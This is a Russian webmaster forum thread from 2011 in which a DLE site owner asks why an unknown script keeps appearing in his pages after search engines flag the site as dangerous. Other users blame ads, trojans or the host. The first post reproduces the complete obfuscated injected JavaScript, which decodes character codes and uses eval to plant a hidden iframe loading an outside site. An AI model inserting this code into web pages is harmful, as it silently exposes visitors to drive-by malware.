Rocki 1 Опубликовано: 14 марта 2011 Рассказать Опубликовано: 14 марта 2011 Движок сайта dle 9.2 лицензия. Внизу кода страницы перед </body> обнаружил неизвестный код, он исчезает, он не постоянно вылезает: <script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#va','background:url(data:,String.fromCharCode)');var god=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var um=r[i].cssRules||r[i].rules;for(var mr=0;mr<um.length;mr++){var xld=um.item?um.item(mr):um[mr];if(!xld.selectorText.match(/#va/))continue;nfiv=(xld.cssText)?xld.cssText:xld.style.cssText;god=nfiv.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];ey=xld.selectorText.substr(1);};}catch(e){};} ff=new Date(2010,11,3,2,21,4);t=ff.getSeconds();var hee=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,448/t,420/t,396/t,416/t,404/t,464/t,388/t,184/t,440/t,404/t,464/t,188/t,460/t,436/t,388/t,456/t,464/t,184/t,448/t,416/t,448/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,448/t,420/t,396/t,416/t,404/t,464/t,388/t,184/t,440/t,404/t,464/t,188/t,460/t,436/t,388/t,456/t,464/t,184/t,448/t,416/t,448/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var lj="";var g=function(){return this;}();eysa=g["e"+ey+"l"];var ippk='';wy=eysa(god);for(var i=0;i<hee.length;i++){el=eysa(hee[i]);ippk+=wy(el);} eysa(ippk);</script> Да нашел это в файле engine\classes\js\bbcodes.js но проверил и этот файл такой же, как исходный с чистого движка файл. Только интересно зачем этот код переодически появляется в коде страниц? Цитата Ссылка на сообщение Поделиться на других сайтах
DeeMon 73 Опубликовано: 14 марта 2011 Рассказать Опубликовано: 14 марта 2011 в обязательном порядке вы должны указывать ссылку на ваш сайт Цитата Ссылка на сообщение Поделиться на других сайтах
Rocki 1 Опубликовано: 14 марта 2011 Рассказать Опубликовано: 14 марта 2011 (изменено) Автор Опишу ситуацию подробней: Буду рад, если Вам удасться помочь мне с моим сайтом music-create.ru. Проблема такая: примерно дней 20 назад, я обнаружил, что мой сайт Гугл выводит в поиске с приставкой «Этот сайт может угрожать безопасности вашего компьютера». Зайдя в панель управления, пересмотрев файлы в корне сайта мне ничего опасного найти не удалось. А в коде странице сверху был виден JavaScript со ссылкой на чужой сайт, в google.com/webmasters также указывали на этот код. Мне пришлось восстановить бэкап сайта, код исчез, гугл доволен. Я сразу изменил пароли к сайту и ftp. Но через несколько дней уже Яндекс вывел информацию «Этот сайт может угрожать безопасности вашего компьютера», но что интересно, стороннего кода в странице не обнаружил, запросил перепроверить в webmaster.yandex.ru, на следующий день сайт стал нормально отображаться в поиске. Но так повторялось уже несколько раз через 2-3 дня, при этом кода не нахожу. Делаю запрос на перепроверку - сайт через 1-2 дня в поиске, потом опять - «Этот сайт может угрожать безопасности вашего компьютера». Сам думаю, что может какой-то код внедрен и он "работает" не постоянно, а то включается, то нет. Но найти его не получается. До этого стоял движок DLE 8.3, 6 дней назад обновил до 9.2 (лицензия). А Сегодня вот опять к концу дня Яндекс выводит эту надпись. Вот собственно поэтому я и задал вопрос по скрипту. Изменено 14 марта 2011 пользователем Rocki Цитата Ссылка на сообщение Поделиться на других сайтах
Slavchik.ru 17 Опубликовано: 14 марта 2011 Рассказать Опубликовано: 14 марта 2011 (изменено) рекламо на сайте может тянуть вредоностный код и халявные шаблоны! Изменено 14 марта 2011 пользователем Slavchik.ru Цитата Ссылка на сообщение Поделиться на других сайтах
Rocki 1 Опубликовано: 14 марта 2011 Рассказать Опубликовано: 14 марта 2011 (изменено) Автор рекламо на сайте может тянуть вредоностный код! С рекламой могу согласится, шаблон официальный gemini, но вопрос по первому посту Изменено 14 марта 2011 пользователем Rocki Цитата Ссылка на сообщение Поделиться на других сайтах
ArtemNY 17 Опубликовано: 14 марта 2011 Рассказать Опубликовано: 14 марта 2011 (изменено) Убрать рекламу и моды если есть. Убрать всё лишнее из папки со скриптом. Проверить внутренним антивирусом. После всего этого посмотреть бутел-ли появляться скрипт. Ну и на всякий случай перезалить все файлы движка... Может какой-то файл недокочался... 99.9% уверен что это реклама притащила... Изменено 14 марта 2011 пользователем ArtemNY Цитата Ссылка на сообщение Поделиться на других сайтах
DeeMon 73 Опубликовано: 14 марта 2011 Рассказать Опубликовано: 14 марта 2011 В Яшке он и сейчас пишет- Сайт music-create.ru может угрожать безопасности вашего компьютера. Я лично не уверен в рекламе, хотя возможно, меня смущают баннеры от n.adonweb.ru Цитата Ссылка на сообщение Поделиться на других сайтах
Rocki 1 Опубликовано: 14 марта 2011 Рассказать Опубликовано: 14 марта 2011 Автор Все-таки никто не ответил на вопрос: Скрипт, который стоит в первом посту расположен в оригинальном скрипте dle 9.2 в файле engine\classes\js\bbcodes.js, почему он иногда появляется в коде страниц сайта? Цитата Ссылка на сообщение Поделиться на других сайтах
ArtemNY 17 Опубликовано: 14 марта 2011 Рассказать Опубликовано: 14 марта 2011 Все-таки никто не ответил на вопрос: Скрипт, который стоит в первом посту расположен в оригинальном скрипте dle 9.2 в файле engine\classes\js\bbcodes.js, почему он иногда появляется в коде страниц сайта? А модификации какие-то есть? Цитата Ссылка на сообщение Поделиться на других сайтах
Rocki 1 Опубликовано: 14 марта 2011 Рассказать Опубликовано: 14 марта 2011 Автор А модификации какие-то есть? Вообщем нет. Движок установил неделю назад. Дополнительно поставил только: чат (но он в принципе уже проверен многими пользователями и хорошие отзывы)реклама от гугла-адсенсреклама от пай-клик Цитата Ссылка на сообщение Поделиться на других сайтах
DeeMon 73 Опубликовано: 14 марта 2011 Рассказать Опубликовано: 14 марта 2011 Скрипт, который стоит в первом посту расположен в оригинальном скрипте dle 9.2 в файле engine\classes\js\bbcodes.js Сравните с оригиналом, там нет такого кода, точнее он там иной вид имеет. Цитата Ссылка на сообщение Поделиться на других сайтах
Rocki 1 Опубликовано: 14 марта 2011 Рассказать Опубликовано: 14 марта 2011 Автор Скрипт, который стоит в первом посту расположен в оригинальном скрипте dle 9.2 в файле engine\classes\js\bbcodes.js Сравните с оригиналом, там нет такого кода, точнее он там иной вид имеет. Да, он там чуть по другому выглядит, но то, что этот скрипт именно из этого файла, сомнений просто нет. Но почему он все-таки выводится на страницах? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 14 марта 2011 Рассказать Опубликовано: 14 марта 2011 Подобного кода никогда не было и нет в оригиальном файле engine/classes/js/bbcodes.jsБолее того если он вас был бы в этом файле, то никак не появлялся бы теле самой страницы после тега </body>, вам верно сказали, снимайте рекламу с сайта, также проверяйте свой комьютер на трояны, это они могут добавлять код в тело страницы. Цитата Ссылка на сообщение Поделиться на других сайтах
DeeMon 73 Опубликовано: 15 марта 2011 Рассказать Опубликовано: 15 марта 2011 Да, и не исключайте возможности дырявого сервера у хостера. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.